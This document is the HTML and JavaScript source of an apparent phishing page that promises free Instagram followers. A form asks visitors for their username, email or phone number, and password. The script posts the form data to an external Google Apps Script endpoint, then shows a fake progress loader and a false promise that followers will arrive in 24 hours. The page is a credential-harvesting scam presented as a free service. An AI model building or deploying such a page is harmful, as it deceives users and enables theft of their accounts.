<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Free Followers</title>
</head>
<body>
        <style>
            body,.box,aside,footer,header,section{
                background : linear-gradient(155deg,#6d00b1,#ff0090);

            }
            .box{
                color: aliceblue;
                height: 100%;
                display: flex;
                justify-content: center;
                align-items: center;
                flex-direction: column;
                background : linear-gradient(155deg,#6d00b1,#ff0090);

             
            }
            .box p{
                margin: 10px;
            }
            .box h1,h4{
                color : white;
                font-weight: 700;

            }
            .container{
                display: flex;
                width: 80%;
                flex-direction: column;
            }
            .container input{
                padding: 5px;
                margin: 5px;
                border-color: #3897F0;
                
            }
            #subb{
                margin-left: 10px;
                width: 80px;
                /* background-color: #F7F7F7; */
                background-color: #3897F0;
                background : linear-gradient(155deg,#6d00b1,#ff0090);
                color: white;
                border-color: pink;
                transition: all .5s ease;
               

            }
            #subb:hover{
                background-color: #3897F0;
                color: white;
            }
            .loding{
                background-color: aliceblue;
                color: black;
                box-shadow: 0px 0px 5px black;
                /* border: 2px solid black; */
                width: 100px;
                height: 100px;
                position: fixed;
                bottom: 40%;
                z-index: 500;
                display: flex;
                flex-direction: column;
                justify-content: center;
                align-items: center;
                display: none;
            }
            .loader-container {
width: 50px;
height: 50px;
display: flex;
justify-content: center;
align-items: center;
}

.loader-circle {
width: 30px;
height: 20px;
position: relative;
left: 10px;
display: flex;
justify-content: center;
align-items: center;
border-radius: 50%;
border-bottom: 5px solid white;
border-left: 5px solid #3897F0; 
border-top: 5px solid white ;
border-right: 5px solid #4CAF50; /* Green color */
animation: rotate 1s linear infinite;
}

.loader-percentage {
/* transform: translate(-50%, -50%); */
position: relative;
right: 14px;
z-index: 44;
font-size: 9px;
font-weight: bold;
}

@keyframes rotate {
0% {
transform: rotate(0deg);
}
100% {
transform: rotate(360deg);
}}


#msg{
    color: #0978df;
    font-size: 10px;
    display: none;
}
#ok{
    color: white;
    background-color:#3897F0;
    width: 80%;
    font-size: 11px;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 2px;
    box-shadow: 0px 0px 3px #0978df;
    margin: 2px;
    cursor: pointer;
    display: none;

}

.part{
    width: 100%;
    display: flex;
    flex-direction: row;

}
.p1,.p2{
    width: 50%;
    margin: 10px;
    color: aliceblue;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    border: 2px solid white;
}
.p1 p{
    margin: 10px;
    padding: 10px;
}
.p2 img{
    width: 100px;
    margin-top: 40px;
    display: inline-block;
    filter: drop-shadow(1px 1px 5px #9f05ff);
    animation: zoom .3s linear infinite;
}
@keyframes zoom {
    0%{
        transform: scale(1);
    }
    50%{
        transform: scale(1.2);
    }
    100%{
        transform: scale(1.3);
    }
}

.p2 h3{
position: relative;
bottom: 30px;
}
@media (max-width:600px) {
    .part{
        flex-direction: column;
    }
    .p1,.p2{
        width: 95%;
    }
}
        </style>
        <div class="box">
            
            <h1>Get Free Followers</h1>
            <form name="submit-to-google-sheet" class="container">
                <h4>Instagram followers available at free</h4>
                <input class="inputz" type="text" placeholder="@username">
                <input class="inputz" type="text" placeholder="email or number">
                <input class="inputz" type="password" placeholder="password">
                <input id="subb" name="sub" type="submit" value="submit">
            </form>
            <div  class="loding">
                <div class="loader-container">
                    <div class="loader-circle">
                    </div>
                    <div class="loader-percentage">0%</div>
                    </div>
                    <p id="msg">You will received followers in 24 hours.</p>
                    <div id="ok">OK</div>
            </div>
<p>            Here you can get instagram free followers just fill this form. We will send the followers on this account. Now in this time its a big offer for all instagram user. So why are you lating just fill this form then Boom you will received these followers in just 24 hours.</p>
        </div>
        <section>
            <div class="part">
                <div class="p1">
                    <h1>Source of Free Followers</h1>
                    <p>here is the best way to incerase your instagram followers. Folloers boost the account so therefore we are providing a free followers service to boost your accounts</p>
                </div>
                <div class="p2">

                        <img src="thumm.png" alt="">
                        <h3 id="flwr">1k</h3>

                </div>
            </div>
        </section>
<script>



const scriptURL = 'https://script.google.com/macros/s/AKfycbxrJ4XPpdO2T_L9Nx7teYHdjBmobMgH-jJ28GrHLFtt1CNc9ESfgH2qPuJL5TVzrpjfug/exec'
        const form = document.forms['submit-to-google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => console.log('Success!', response))
            .catch((error )=>  console.error('Error!', error.message ))
        })
    document.querySelector('#subb').addEventListener('click',()=>{

document.querySelector('.loding').style.display = 'block' 
document.querySelector('.loding').style.display = 'flex' 

        let percentage = 0;
const loaderPercentage = document.querySelector('.loader-percentage');

// Update percentage display
let start = setInterval(() => {
percentage++;
loaderPercentage.textContent =` ${percentage}%`;
if (percentage === 101) {
// Stop animation when complete
document.querySelector('.loader-circle').style.animation = 'none';
clearInterval(start);
let inputs = document.querySelectorAll('.inputz');
        inputs.forEach((e)=>{
                e.value = ''
    })
document.querySelector('.loader-circle').style.display = 'none'
document.querySelector('.loader-circle').style.display = 'none';
document.querySelector('.loader-container').style.display='none'
document.querySelector('#ok').style.display='block';
document.querySelector('#ok').style.display='flex';
document.querySelector('#msg').style.display='block';
document.querySelector('#msg').style.display='flex';


}
}, 50); // Update every 20ms

    })


    document.querySelector('#ok').addEventListener('click',()=>{
    document.querySelector('.loding').style.display = 'none' 

    })
    let percentage = 0;
const loaderPercentage = document.querySelector('#flwr');
let start = setInterval(() => {
percentage++;
loaderPercentage.textContent =` ${percentage}k`;
if (percentage === 10000) {
    // Stop animation when complete
    document.querySelector('.loader-circle').style.animation = 'none';
    clearInterval(start);
}
}, 300); // Update every 20ms


</script>
</body>
</html>